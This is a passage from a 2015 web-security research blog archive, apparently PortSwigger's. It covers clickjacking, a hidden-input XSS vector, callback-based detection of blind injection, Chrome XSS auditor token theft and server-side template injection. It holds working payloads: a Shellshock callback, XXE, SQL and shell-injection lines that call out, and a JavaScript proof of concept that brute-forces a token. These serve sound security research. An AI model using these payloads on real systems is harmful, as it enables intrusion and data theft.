Wednesday, December 9, 2015

Burp Clickbandit: A JavaScript based clickjacking PoC generator

Clickjacking vulnerabilities are endemic throughout the web and really quite serious in the right circumstances. Manually crafting a proof of concept attack can mean laborious hours of offset-tweaking, so we’ve just released Burp Clickbandit, a point-and-click tool for generating clickjacking attacks. When you have found a web page that may be vulnerable to clickjacking, you can use Burp Clickbandit to quickly craft an attack, to prove that the vulnerability can be successfully exploited. A few related tools already exist, but Burp Clickbandit has an array of features that hopefully make it stand out:
  • Supports multi-click attacks
  • Written in pure JavaScript, and trivial to deploy
  • Supports transparency, clearly showing the attack mechanics
  • Works on most websites!
As of today's Burp release, you can grab a copy of Clickbandit from within Burp, via the Burp menu. To deploy it, install it as a bookmarklet or simply paste it into your browser's developer console. It works by detecting the HTML elements you click and using their dimensions and position to generate the relevant click area. If the click lands in an iframe or flash object, it instead uses the x and y coordinates of the mouse, and zooms into the object to provide the click area. This is because the DOM element will be the entire frame and so the position will be incorrect.

In order to launch multi-click attacks, it’s critical to be able to detect when the user has clicked so you know when to move the iframe to the next clicktarget. To detect clicks cross domain we use the blur event on the current window; this fires when you click inside the iframe. We use an onmouseover event on the iframe and a flag to ensure the click happens inside the frame boundary. This isn’t perfect because a right click on the iframe will also trigger the blur event but there is no way around that due to same origin policy. Here is the relevant code snippet:
window.addEventListener("blur", function() {
    if (window.clickbandit.mouseover) {
        setTimeout(function() {
        }, 1000);
}, false);
document.getElementById("parentFrame").addEventListener("mouseover", function() {
    window.clickbandit.mouseover = true;
}, false);
document.getElementById("parentFrame").addEventListener("mouseout", function() {
    window.clickbandit.mouseover = false;
}, false);
We use a timeout because the click won’t be accurately detected unless there is a delay, and we also focus a hidden input field after each click to enable multi-click detection since the blur event won’t be fired unless the focus is switched from the iframe to the parent document.

Using Clickbandit

Record mode

Burp Clickbandit runs in your browser using JavaScript. It works on all modern browsers except for Internet Explorer and Microsoft Edge. To run Clickbandit, use the following steps or refer to the Burp documentation.
  1. In Burp, go to the Burp menu and select "Burp Clickbandit".
  2. On the dialog that opens, click the "Copy Clickbandit to clipboard" button. This will copy the Clickbandit script to your clipboard.
  3. In your browser, visit the web page that you want to test, in the usual way.
  4. In your browser, open the web developer console. This might also be called "developer tools" or "JavaScript console".
  5. Paste the Clickbandit script into the web developer console, and press enter.
The Burp Clickbandit banner will appear at the top of the browser window and the original page will be reloaded within a frame, ready for the attack to be performed. Then simply execute the sequence of clicks you want your victim to perform. If you want to prevent the action being performed during recording, use the "disable click actions" checkbox. When you’ve finished recording, click the "finish" button. This will then display your attack for review.

Review mode

In this view you can adjust the zoom factor using the plus and minus buttons. You can toggle transparency allowing you to see the site underneath the button. You can also change the iframe position using the arrow keys. Reset allows you to restore the original attack removing any modifications you may have made to the zoom factor or position. Click the "save" button to download your proof of concept attack and save it locally. When the clickjacking attack is complete (after the victim has clicked the last link) the message “you’ve been clickjacked” appears. You can alter this message in the code to suit your needs.

You've been clickjacked message

Hope you like the tool and any comments or feedback are welcome. Happy clickjacking! @garethheyes

Monday, November 16, 2015

XSS in Hidden Input Fields

At PortSwigger, we regularly run pre-release builds of Burp Suite against an internal testbed of popular web applications to make sure it's behaving properly. Whilst doing this recently, Liam found a Cross-Site Scripting (XSS) vulnerability in [REDACTED], inside a hidden input element:
<input type="hidden" name="redacted" value="default" injection="xss" />
XSS in hidden inputs is frequently very difficult to exploit because typical JavaScript events like onmouseover and onfocus can't be triggered due to the element being invisible.

I decided to investigate further to see if it was possible to exploit this on a modern browser. I tried a bunch of stuff like autofocus, CSS tricks and other stuff. Eventually I thought about access keys and wondered if the onclick event would be called on the hidden input when it activated via an access key. It most certainly does on Firefox! This means we can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
<input type="hidden" accesskey="X" onclick="alert(1)">
This vector isn't ideal because it involves some user interaction, but it's vastly better than expression() which only works on IE<=9.

Note: We've reported this vulnerability to the application's security team. However, they haven't responded in any way after 12 days and a couple of emails. We wanted to make people aware of this particular technique, but we won't be naming the vulnerable application concerned until a patch is available.

This isn't the first time that Burp Scanner has unearthed a vulnerability in an extremely popular web application, and we doubt it will be the last.

Mind those access keys... - @garethheyes

Tuesday, September 15, 2015

Hunting Asynchronous Vulnerabilities

This is mildly abridged (and less vendor-neutral) writeup of the core technical content from my Hunting Asynchronous Vulnerabilities presentation from 44Con and BSides Manchester. You can watch a recording on youtube and download the slides here.

In blackbox tests vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms, like blind second order SQL injection and shell command injection via nightly cronjobs or asynchronous logging functions, can easily survive repeated pentests and arrive in production unfixed.

The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen. Since the release of Burp Collaborator, we have been able to use callback based vulnerability hunting techniques in Burp Scanner. This post details some of the ongoing research I've been doing on callback based vulnerability hunting.

The asynchronous problem

Many asynchronous vulnerabilities are invisible. That is, there's no way to:
  • Trigger error messages
  • Cause differences in application output
  • Cause detectable time delays
This makes them inherently difficult to find. Please note that invisible vulnerabilities should not be confused with 'blind' SQL injection; with blind SQL injection an attacker can typically cause a noticeable time delay or difference in page output.

Invisible vulnerabilities can be roughly grouped into three types:
  • Server-side vulnerabilities in processing that occurs in a background thread, such as a shell command injection in a nightly cronjob or SQLi in a queued transaction. Here, a crafted payload might trigger a time delay, but the delay would only affect a background thread so it wouldn't be detectable. 
  • Blind vulnerabilities that are triggered by a secondary event, such as blind XSS and some second order SQLi. Detection of these issues using normal techniques is possible but often tricky and error-prone.
  • Vulnerabilities where there is no way to cause a difference in application output, and the technology doesn't support anything that can be used to cause a reliable time delay. For example, blind XXE or XPath injection.

The asynchronous solution

Asynchronous vulnerabilities can be found by supplying a payload that triggers a callback - an out-of-band connection from the vulnerable application to an attacker-controlled listener.

For example, the following payload was observed being used to detect servers vulnerable to Shellshock:
() { :;}; echo 1 > /dev/udp/
This payload tries to exploit the Shellshock vulnerability to make the targeted system send a UDP packet to port 53 of If receives such a packet, that indicates that the connecting server is vulnerable and they can follow up with further exploits.

Many common vulnerability classes can be identified by delivering an exploit that triggers a callback, making it possible to find these vulnerabilities without relying on any application output. Burp Suite uses the Burp Collaborator server as a receiver for these external interactions:

DNS is the ideal protocol for triggering callbacks, as it's rarely filtered outbound on networks and also underpins many other network protocols.

Callback development

Crafting an exploit for a typical vulnerability is an iterative process; based on application feedback an attacker can start with a generic fuzz string and slowly refine it into a working payload. Creating an effective callback-issuing payload can be difficult because callback exploits fail hard - if the exploit fails, you get no indication that the application is vulnerable.

As a result, the quality of callback exploits is crucial - they should work without modification in as many situations as possible. An ideal callback exploit will work regardless of the vulnerable software implementation, underlying operating system, and the context it appears in, and be resistant to common filters.

XML vulnerabilities

A key way to achieve environment insensitivity is to use features of the vulnerability itself to issue the callback. For example, the following XML document uses six different XML vulnerabilities/features to attempt to issue a callback.
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xml" href=""?>
<!DOCTYPE root PUBLIC "-//A/B/EN" [
  <!ENTITY % remote SYSTEM "">
  <!ENTITY xxe SYSTEM "">
  <x xmlns:xi=""><xi:include
    href="" /></x>
  <y xmlns=http://a.b/
The final two payloads here - XInclude and schemaLocation - are particularly powerful because they don't require complete control over the XML document to work. This means that they can be used to find blind XML Injection, a vulnerability that is otherwise extremely difficult to identify.

SQL Injection

SQL itself doesn't define any statements that we can use to issue a callback, so we'll need to look at each popular SQL database implementation individually.


PostgreSQL is easy to trigger a callback from, provided the database user has sufficient privileges. The copy command can be used to invoke arbitrary shell commands:
copy (select '') to program 'nslookup'
I've used nslookup here because it's available on both windows and *nix systems by default. Ping is an obvious alternative, but when invoked on Linux it never exits and thus may hang the executing thread.

MySQL and SQLite3

On Windows, most filesystem functions can be fed a UNC path - a special type of file path that can reference a resource on an external server, and thus triggers a DNS lookup. This means that on Windows almost all file I/O functions can be used to trigger a callback.

SQLite3 has two useful features that can be used to cause a callback via a UNC path:
;attach database '//' as 'z'-- -

(SELECT load_extension('//foo'))
Neither is perfect - the former requires batched queries, and the latter relies on load_extension being enabled.

MySQL has a couple of similar functions, neither of which require batched queries:



Microsoft SQL Server offers quite a few ways to trigger pingbacks:
SELECT * FROM openrowset('SQLNCLI', '';'a',   'select 1 from dual')
(Requires 'ad hoc distributed queries')
EXEC master.dbo.xp_fileexist '\\\\\\foo'
(Requires sysadmin privileges)
BULK INSERT mytable FROM '\\\\$file'
(Requires bulk insert privileges)
EXEC master.dbo.xp_dirtree '\\\\\\foo'
(Ideal - requires sysadmin privileges but checks privileges after DNS lookup)

Oracle SQL

Oracle offers a huge number of ways to trigger a callback: UTL_HTTP, UTL_TCP, UTL_SMTP, UTL_INADDR, UTL_FILE…

If you like you can use UTL_SMTP to write a SQL injection payload that sends you an email describing the vulnerability when executed. However, they all require assorted privileges that we might not have.

Fortunately, there's another option. Oracle has built-in XML parsing functionality, which can be invoked by low privilege users. And, yes, recently Khai Tran of NetSPI found that Oracle is vulnerable to XXE Injection. This means that we can chain our SQL injection with an XXE payload to trigger a callback with no privileges:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY %  remote SYSTEM ""> %remote;]>'),'/l')

Write-based callbacks

As you've probably noticed by this point, non-Windows systems are quite a lot harder to trigger callbacks on because the core filesystem APIs don't support UNC paths. However, we may be able to indirectly trigger a callback via a 'write a file' function.

The obvious way to do this is to write a web shell inside the webroot. However, this isn't ideal from an automated scanner's perspective - we don't know where the webroot is so we'd have to spray the filesystem with shells, which clients might not be too happy about.

A less harmful alternative approach is to exploit mailspools / maildrops. Some mailers have a folder where any correctly formatted files will be periodically grabbed and emailed out. This approach looked promising at first, but I couldn't get it to work on any major *nix mailers without root privileges, making it pretty much useless.

There's one other option - we can try to tweak a config file. Although MySQL's SELECT INTO OUTFILE can't be used to overwrite files, MySQL itself uses a file loading strategy that means we can potentially override options without actually need to overwrite an existing file. A file written to $MYSQL_HOME/my.cnf or ~/.my.cnf will take precedence over the global /etc/mysql/my.cnf file. We can trigger a callback when the server is next restarted by overriding the bind-address option with our hostname. There is a slight catch - the server will then try to bind to that interface and probably fail to start. We can mitigate this by responding to the DNS lookup with, making the server bind to all available interfaces. However, this causes other issues which are left to the reader's imagination.

Shell command injection

Triggering a callback when we have arbitrary code execution is really easy. That said, we don't necessarily know what context our string is appearing in, or even what the underlying operating system is. It would be ideal to craft a payload that worked in every plausible context:
bash   :$ command arg1 input arg3
bash ":$ command arg1 "input" arg3
base  ':$ command arg1 'input' arg3
win  : >command arg1 input arg3
win ": >command arg1 "input" arg3
By creating a test page that executed the supplied string in each of the five contexts, and iteratively tweaking it to improve coverage, I developed the following payload:
bash  : &nslookup'\"`0&nslookup`'
bash ": &nslookup'\"`0&nslookup`'
bash ': &nslookup'\"`0&nslookup`'
win   : &nslookup'\"`0&nslookup`'
win  ": &nslookup'\"`0&nslookup`'

Key: ignored context-breakout dud-statement injected-command ignored

Cross-Site Scripting

As with shell command injection, it's easy to use XSS to trigger a pingback, but we don't know what the syntax surrounding our input will be - we might be landing inside a quoted attribute, or a <script> block, etc. We also don't know which characters may be filtered or encoded.

Gareth Heyes crafted a superb payload to work in most common contexts. First it breaks out of script context and opens an SVG event handler:
Then it breaks out of single-quoted attribute, double-quoted attribute, and single/double quoted JavaScript literal contexts:
After this point everything is executed as JavaScript, so it's just a matter of importing an external JavaScript file, and grabbing a stack trace to help track down the issue afterwards:
Burp Suite will be using this payload as part of its active scanner within the next few months. If you're impatient, check out the Sleepy Puppy blind XSS framework recently released by Netflix.

Asynchronous Exploit Demo

The live demo showed an asynchronous Formula Injection vulnerability being used to exploit users of a fully patched analytics application:

The version of LibreOffice shown in the demo is missing a few security patches and thus vulnerable to CVE-2014-3524. The Microsoft Excel installation is fully patched.


Of the techniques discussed, Burp Suite currently uses all the XML attacks, the shell command injection attack, and the best SQL ones. Blind XSS checks are coming soon. We're excited to see if these techniques root out some vulnerabilities that have been allowed to stay hidden for too long. Hopefully this has also provided a solid a rationale for why it's worth deploying your own private Collaborator server if you'd prefer not to use PortSwigger's public one.

Enjoy - @albinowax

Monday, September 7, 2015

T-shirt competition winners

We've just mailed out prizes to the winners of our T-shirt competition.

Below are the 40 entries that won a Burp Suite T-shirt:
  • @0xdeadb - [...] callbacks.setExtensionName("I love Burp Suite because it can be extended for my specific needs"); [...]
  • @7MinSec - I love Burp Suite because I can tell clients "I'm gonna hit you with a cluster bomb & then a pitch fork!" and not get arrested.
  • @JGJones - I love Burp Suite because I can claim my baby daughter is an awesome hacker whenever she burps. Pic: with nethacker
  • @JGamblin - I love Burp Suite because there is nothing like the CFO calling and asking "What is a Burp Suite is and why do we need 8 of them?"
  • @SelsRoger - I love Burp Suite because it allows for repeatable - help I'm being held hostage in an XSS factory- results.
  • @TryCatchHCF - I love Burp Suite because customizing Intruder attack types and positions show me the smoke that leads me to building the fire.
  • @Yabadabaduca - I love Burp Suite because it satisfies my needs better than my husband
  • @benholley - I love Burp Suite because @PortSwigger answers support emails personally. And quickly.
  • @blitzfranklyn - I love Burp Suite because my wife says it makes me look sexy!
  • @c0ncealed - I love Burp Suite because screenshots with: ? Credit Card Data / PII ? Site Secured by $vendor logo ? Burp Suite ...make a report!
  • @c1472b039f12485 - I love Burp Suite because I intercepted this tweet and made it something wittier
  • @crisp0r - I love Burp Suite because Peter Weiner grew up and stopped getting me into awkward conversations
  • @eficker - I love Burp Suite because no matter what horse manure (read obscure) encoding a site happens to use, it always proxy's up in plaintext. <3
  • @gsuberland - I love Burp Suite because SSBsb3ZlIEJ1cnAgU3VpdGUgYmVjYXVzZSBjbVZqZFhKemFXOXVJR2x6SUdaMWJnPT0=
  • @infosecabaret - I love Burp Suite because You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version f
  • @irsdl - I love Burp Suite because of the great minds behind it! because I loved WAHH ;) From WebAppSec lovers 4 WebAppSec lovers!!!
  • @itsec4u - I love Burp Suite because .. it's your Swiss Army knife in the dark realm of AppSec threats !
  • @j34n_d - I love Burp Suite because the repeater, repeater, repeater, repeater, repeater, repeater, repeater, repeater, is so easy to use.
  • @jakx_ - I love Burp Suite because Peter weiner for president! Cc @peterwintrsmith
  • @joshbozarth - I love Burp Suite because it’s better than Burp Sour.
  • @lnxdork - I love Burp Suite, it works with my selenium scripts to make security checking web app updates into a repeatable process!
  • @magnusstubman - I love Burp Suite because
  • @michaelsmyname - I love Burp Suite because bug bounties wouldn't be as fun without it.
  • @mikerod_sd - I love Burp Suite because I can simulate manual testing when I need to go to the doctors...... or recover from a hangover
  • @n0x00 - I love Burp Suite because the sound of whimpering dev's denied 'go live' gives me a semi :D? ... too ... too much ?
  • @n3tjunki3 - . I love Burp Suite because it's like a cheeky Nando's
  • @phillips321 - I love Burp Suite because without it I could not have an 'extended' lunch break, thanks @PortSwigger for the Simulate manual testing feature
  • @pjgmonteiro - I love Burp Suite because my favorite toy when I was younger were LEGO, now is the Burp Suite.
  • @pytharmani - I love Burp Suite because some developers be like "what?? How?? Even with HTTPS??"
  • @righettod - I love Burp Suite because it's like Nutella, once you have try it you cannot use another tool.
  • @schniggie - I love Burp Suite because it's the best web security tool you can get and buy by only pwning one bug. ROI is almost 0day :-)
  • @seanmeals - I love Burp Suite because it's helped me make a killing on bug bounties for a small investment of $300.
  • @sizzop - I love Burp Suite because "><script>alert('pwnd')</script>
  • @strawp - I love §Burp Suite§ §reasons§
  • @thedarkmint - I love Burp Suite because it's the mutant Swiss Army knife of web testing
  • @thegmoo - I love Burp Suite because it's possible to use Repeater to automate extreme participation in this contest
  • @tsmalmbe - I love Burp Suite because it swiggs my ports just right
  • @waptor75 - I love Burp Suite because it's my appsec Swiss Army chainsaw.
  • @ydoow - I love Burp Suite because the price seems even reasonable to tight arse northerners
  • @zebarg - I love Burp Suite because it made a vulgar word acceptable in professional conversations.

Friday, August 28, 2015

Burp Suite training courses

We're very pleased to announce an expanded list of Burp Suite training partners. Whether you are a Burp novice or an expert user, our training partners can offer you hands-on training to help you to get the most out of Burp Suite.

Our training partners offer courses at public events, and all courses can be presented privately on-site at your location.

The new Burp Suite Training page includes details of the different courses that are available, and dates of forthcoming public events where these training courses will be happening. Over time, we'll be adding details of more training partners to provide an even wider range of course options.

Thursday, August 27, 2015

Gartner continues to recognize PortSwigger as a Challenger for Application Security Testing in 2015

On August 6 2015 Gartner released its annual Magic Quadrant for Application Security Testing, with PortSwigger Web Security placed as a Challenger* for the second year, based on its ability to execute and completeness of vision.

In this latest report, analysts Joseph Feiman and Neil MacDonald state that “highly publicized breaches in the last 12 months have raised awareness of the need to identify and remediate vulnerabilities at the application layer”. In addition, that “attackers have increased the sophistication and frequency of their attacks, motivated financially by the theft of monetary assets, intellectual property and sensitive information”.

At PortSwigger we have always believed in pushing the boundaries of web security testing, and we continue to invest heavily in our research and development capabilities to help our users to respond to the rapidly evolving threats they face.

Dafydd Stuttard, founder of PortSwigger Web Security commented:

“Our accelerated investment and ambitious roadmap over the last 12 months have resulted in developments that have fundamentally improved the web scanning functionality that is available to our users.

“We released Burp Collaborator in April of this year, which has the potential to revolutionize web security testing. Over time, Burp Collaborator will enable Burp to detect issues like blind XSS, asynchronous code injection, and various as-yet-unclassified vulnerabilities. In the coming months, we will be adding many exciting new capabilities to Burp, based on the Collaborator technology.

“We have also pioneered research into two completely new types of vulnerability. Over the past 12 months we have released scan checks to find both server-side template injection and PRSSI (path-relative style sheet imports). Burp was the first scanner to detect these two serious vulnerabilities.”

Stuttard goes onto say that he is excited about the next 12 months at PortSwigger. “As one of the most widely adopted web security tools in the marketplace, we have a very large and loyal user community, which we will continue to listen to. That, coupled with our ability to remain agile as a company, allows us to respond rapidly to market developments. We are expecting to release many new exciting features in the coming months.”
*Gartner define Challengers in this magic quadrant as “vendors that have executed consistently, typically by focusing on a single technology (for example, SAST or DAST) or a single delivery model (for example, on AST as a service only). In addition, they have demonstrated substantial competitive capabilities against the Leaders in this particular focus area, and also have demonstrated momentum in their customer base in terms of overall size and growth.”

PortSwigger Web Security is a global leader in the creation of software tools for security testing of web applications. For nearly a decade, we have worked at the cutting edge of the web security industry, and our suite of tools is well established as the de facto standard toolkit used by web security professionals.

Gartner disclaimer: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation . Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Wednesday, August 26, 2015

New release cycle for Burp Suite Free Edition

For a long time, we've released updates to Burp Suite Free Edition every year or so, when Burp gets a new major version number. The Professional Edition is updated much more frequently, often a few times per month.

We've decided to change the Free Edition release cycle, for two reasons:
  • From time to time, we apply fixes within Burp to accommodate changes in modern browsers, cryptographic standards, or other developments. It's not good for the Free Edition to lag behind on these kind of updates.
  • We work continuously on incremental enhancements to Burp, and it is sometimes artificial to pick a particular update out as being a "major" release. We don't want to be incrementing our major version number solely because we're overdue an update of the Free Edition.
Starting today, we will release updates to the Free Edition of Burp much more frequently. Every few versions of the Professional Edition will be accompanied by an update to the Free Edition. Since the majority of updates to the Professional Edition only change features within that edition, such as Burp Scanner, it isn't necessary to update the Free Edition every time. But we will do so periodically whenever changes have been made that apply to both editions.

Of course, the Free Edition of Burp will always continue to remain free of charge, and the frequent updates we make to the Professional Edition will still be made available to licensed users without any additional charge.

Monday, August 17, 2015

Abusing Chrome's XSS auditor to steal tokens

Detecting XSS Auditor

James pointed out to me that XSS auditor in Chrome has a block mode and I thought it might be interesting to see if this could be exploited in some way. When the http header is set "X-XSS-Protection: 1; mode=block" XSS auditor removes all content on the page when a XSS attack is detected. I thought could use this to my advantage because if the target site contained an iframe then I could use the length property of the window to detect if the iframe was destroyed. In all modern browsers you can use contentWindow.length across domains. As the following code demonstrates.
<iframe onload="alert(this.contentWindow.length)" src="http://somedomain/with_iframe"></iframe>
So if the site has an iframe you will see an alert box with 1 and if not an alert of 0. If there is more than one iframe then it will alert the amount of iframes on the site. Basically this gives us a true or false condition to detect XSS auditor.

Getting a user id

My first thoughts on how to exploit this was to read a user id from in-line script. By injecting fake XSS vectors and monitoring the length property to see if the XSS auditor was active. Injecting a series of fake vectors incrementing the user id each time to detect the correct value. The output of the target page would look like this:
header("X-XSS-Protection: 1; mode=block");



uid = 1337;

As you can see we put the XSS filter in block mode, the page contains an iframe and the script block contains a user id. Here's what the fake vectors look like:
?fakevector=<script>%0auid = 1;%0a
?fakevector=<script>%0auid = 2;%0a
?fakevector=<script>%0auid = 3;%0a
?fakevector=<script>%0auid = 4;%0a
XSS auditor ignores the closing script but the ending new line is required in order to detect XSS. Here is a simple PoC to extract the uid:
 var url = 'http://somedomain/chrome_xss_filter_bruteforce/test.php?x=<script>%0auid = %s;%0a<\/script>',
  amount = 9999, maxNumOfIframes = 1;
 for(var i=0;i<maxNumOfIframes;i++) {
 function createIframe(min, max) {
  var iframe = document.createElement('iframe'), div, p = document.createElement('p');
  iframe.title = min;
  iframe.onload = function() {
    p.innerText = 'uid='+this.title;
    return false;
   if(this.title > max) {
   } else {
    this.contentWindow.location = url.replace(/%s/,++this.title)+'&'+(+new Date);
   p.innerText = 'Bruteforcing...'+this.title;
  iframe.src = url.replace(/%s/,iframe.title);
The code creates one iframe (you could create multiple iframes but in this instance 1 iframe was faster), uses the onload handler and checks the contentWindow.length if it's found it returns the user id otherwise it tries the next value by setting the iframe location.

Using windows

If a website has x-frame-options or a CSP policy that prevents the site from being framed it's still possible to detect XSS auditor using new windows. Unfortunately we can't use the onload event handler for new windows as this isn't allowed cross domain for security reasons however we can get round this using timeouts/intervals to wait for the page to load.  The code looks like this:
function poc(id) {
 if(! {
  win ='http://somedomain/chrome_xss_filter_bruteforce/test.php?x=<script>%0auid = '+id+';%0a<\/script>&'+(+new Date),'');
 } else {
  win.location = 'http://somedomain/chrome_xss_filter_bruteforce/test.php?x=<script>%0auid = '+id+';%0a<\/script>&'+(+new Date);
  try {
  } catch(e) {  
   if(win && !win.length) {
   } else {
<a href="#" onclick="poc(1)">PoC</a>
The first line checks if we already have a window, if not it creates a new window and stores a reference to it in a global variable. Then we use an interval with 20 milliseconds to repeatedly check if the XSS detection happened and if not it will call the function again.

Stealing tokens

So far the techniques presented are cool but a bit lame since they are quite restrictive in the data they can retrieve and require the script blocks to be formed in a certain way. Eduardo Vela suggested that I use form action and a existing parameter to pad the filter. I created a PoC that successfully extracts a 32 char hash from a form action!

The page requires an iframe, block mode and a filtered parameter that appears before the token you want to extract. It looks like this:
header("X-XSS-Protection: 1;mode=block"); 
if(!isset($_SESSION['token'])) {
 $token = md5(time());
 $_SESSION['token'] = $token;
} else {
 $token = $_SESSION['token'];

<form action="testurl.php?x=<?php echo htmlentities($_GET['x'])?>&token=<?php echo $token?>"></form>

<?php echo $token?>
The "x" parameter is used to pad the XSS filter to be within the max match length minus 1 so that we can detect part of the token. As each part of the token is detected we reduce the padding accordingly and scan for the next character but there is a complication, zeros are ignored by XSS Auditor this means our string wouldn't be matched and we can't detect zeros because they are ignored. The way round this was to inject every character except zero and if the character isn't being detected once it's gone through the entire hex character set then the character must be zero. This works perfectly well except if there are two zeros adjacent, in this instance I check if there are more than two rounds of checks then there must be two zeros! I remove two characters of the detected token and push in two zeros.

Here is the PoC code:
<div id="x"></div>
function poc(){
 var iframe = document.createElement('iframe'),
  padding = '1234567891234567891234567891234567891234567891234567891234567891234567'.split(''),
  token = "a".split(''),
  tokenLen = 32, its = 0,
  url = 'http://somedomain/chrome_xss_filter_bruteforce/form.php?x=%s&fakeparam=%3Cform%20action=%22testurl.php?x=%s2&token=%s3', last, repeated = 0;
 iframe.src = url.replace(/%s/,padding.join('')).replace(/%s2/,padding.join('')).replace(/%s/,token.join(''));
 iframe.width = 700;
 iframe.height = 500;
 iframe.onload = function() {
  if(token.length === tokenLen+1) {
   alert('The token is:'+token.slice(0,-1).join(''));
   document.getElementById('x').innerText = document.getElementById('x').innerText.slice(0,-1);
   return false;
  if(this.contentWindow.length) {
   if(its > 20) {
    token[token.length-1] = '0';
    its = 0;
   if(repeated > 2) {
    repeated = 0;
    its = 0;
    token[token.length-1] = '0';
   this.contentWindow.location = url.replace(/%s/,padding.join('')).replace(/%s2/,padding.join('')).replace(/%s/,token.join(''));
  } else {
   repeated = 0;
   its = 0;
   this.contentWindow.location = url.replace(/%s/,padding.join('')).replace(/%s2/,padding.join('')).replace(/%s/,token.join(''));
  document.getElementById('x').innerText = 'Token:'+token.join('');
 function getNextChar() {
  chr = token[token.length-1]; 
  if(chr === 'f' && last === 'f') {
   token[token.length-1] = '1';
   last = '1';
   return false;
  }  else if(chr === '9' && last === '9') {
   token[token.length-1] = 'a';
   last = 'a';
   return false;
  if(chr >= 'a' && chr < 'f') {
   token[token.length-1] = String.fromCharCode(chr.charCodeAt()+1);
  } else if(chr === 'f') {
   token[token.length-1] = 'f';
  }  else if(chr >= '0' && chr < '9') {
   token[token.length-1] = String.fromCharCode(chr.charCodeAt()+1);
  }  else if(chr === '9') {
   token[token.length-1] = '9';
  last = chr;
First the padding is injected into the real parameter, then also into our fake parameter along with the form action url. The token can now be checked one character at a time. "its" contains the current iterations if it's above 20 then no character is being detected so it means it must be a zero. If this process is repeated more than twice we have two zeros.

The final PoC is available here. It has been patched in the latest version of Chrome and the PoC no longer works. However here is a video demonstrating the flaw:

Wednesday, August 5, 2015

Server-Side Template Injection

Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point.

Template Injection can arise both through developer error, and through the intentional exposure of templates in an attempt to offer rich functionality, as commonly done by wikis, blogs, marketing applications and content management systems. Intentional template injection is such a common use-case that many template engines offer a 'sandboxed' mode for this express purpose. This paper defines a methodology for detecting and exploiting template injection, and shows it being applied to craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are demonstrated for five of the most popular template engines, including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way.

For a slightly less dry account of this research, you may prefer to watch my Black Hat USA presentation on this topic. This research is also available as printable whitepaper.



Web applications frequently use template systems such as Twig and FreeMarker to embed dynamic content in web pages and emails. Template Injection occurs when user input is embedded in a template in an unsafe manner. Consider a marketing application that sends bulk emails, and uses a Twig template to greet recepients by name. If the name is merely passed in to the template, as in the following example, everything works fine:
$output = $twig->render("Dear {first_name},", array("first_name" => $user.first_name) );
However, if users are allowed to customize these emails, problems arise:
$output = $twig->render($_GET['custom_email'], array("first_name" => $user.first_name) );
In this example the user controls the content of the template itself via the custom_email GET parameter, rather than a value passed into it. This results in an XSS vulnerability that is hard to miss. However, the XSS is just a symptom of a subtler, more serious vulnerability. This code actually exposes an expansive but easily overlooked attack surface. The output from the following two greeting messages hints at a server-side vulnerability:


Object of class __TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78db3538221c1145580ca4a5 could not be converted to string
What we have here is essentially server-side code execution inside a sandbox. Depending on the template engine used, it may be possible to escape the sandbox and execute arbitrary code.

This vulnerability typically arises through developers intentionally letting users submit or edit templates - some template engines offer a secure mode for this express purpose. It is far from specific to marketing applications - any features that support advanced user-supplied markup may be vulnerable, including wiki-pages, reviews, and even comments. Template injection can also arise by accident, when user input is simply concatenated directly into a template. This may seem slightly counter-intuitive, but it is equivalent to SQL Injection vulnerabilities occurring in poorly written prepared statements, which are a relatively common occurrence. Furthermore, unintentional template injection is extremely easy to miss as there typically won't be any visible cues. As with all input based vulnerabilities, the input could originate from out of band sources. For example, it may occur as a Local File Include (LFI) variant, exploitable through classic LFI techniques such as code embedded in log files, session files, or /proc/self/env.

The 'Server-Side' qualifier is used to distinguish this from vulnerabilities in client-side templating libraries such as those provided by jQuery and KnockoutJS. Client-side template injection can often be abused for XSS attacks, as detailed by Mario Heiderich. This paper will exclusively cover attacking server-side templating, with the goal of obtaining arbitrary code execution.

Template Injection Methodology

I have defined the following high level methodology to capture an efficient attack process, based on my experience auditing a range of vulnerable applications and template engines:


This vulnerability can appear in two distinct contexts, each of which requires its own detection method:

1. Plaintext context

Most template languages support a freeform 'text' context where you can directly input HTML. It will typically appear in one of the following ways:
smarty=Hello {}
Hello user1
freemarker=Hello ${username}
Hello newuser
This frequently results in XSS, so the presence of XSS can be used as a cue for more thorough template injection probes. Template languages use syntax chosen explicitly not to clash with characters used in normal HTML, so it's easy for a manual blackbox security assessment to miss template injection entirely. To detect it, we need to invoke the template engine by embedding a statement. There are a huge number of template languages but many of them share basic syntax characteristics. We can take advantage of this by sending generic, template-agnostic payloads using basic operations to detect multiple template engines with a single HTTP request:
smarty=Hello ${7*7}
Hello 49

freemarker=Hello ${7*7}
Hello 49

2. Code context

User input may also be placed within a template statement, typically as a variable name:
Hello user01
This variant is even easier to miss during an assessment, as it doesn't result in obvious XSS and is almost indistinguishable from a simple hashmap lookup. Changing the value from username will typically either result in a blank result or the application erroring out. It can be detected in a robust manner by verifying the parameter doesn't have direct XSS, then breaking out of the template statement and injecting HTML tag after it:

Hello user01 <tag>


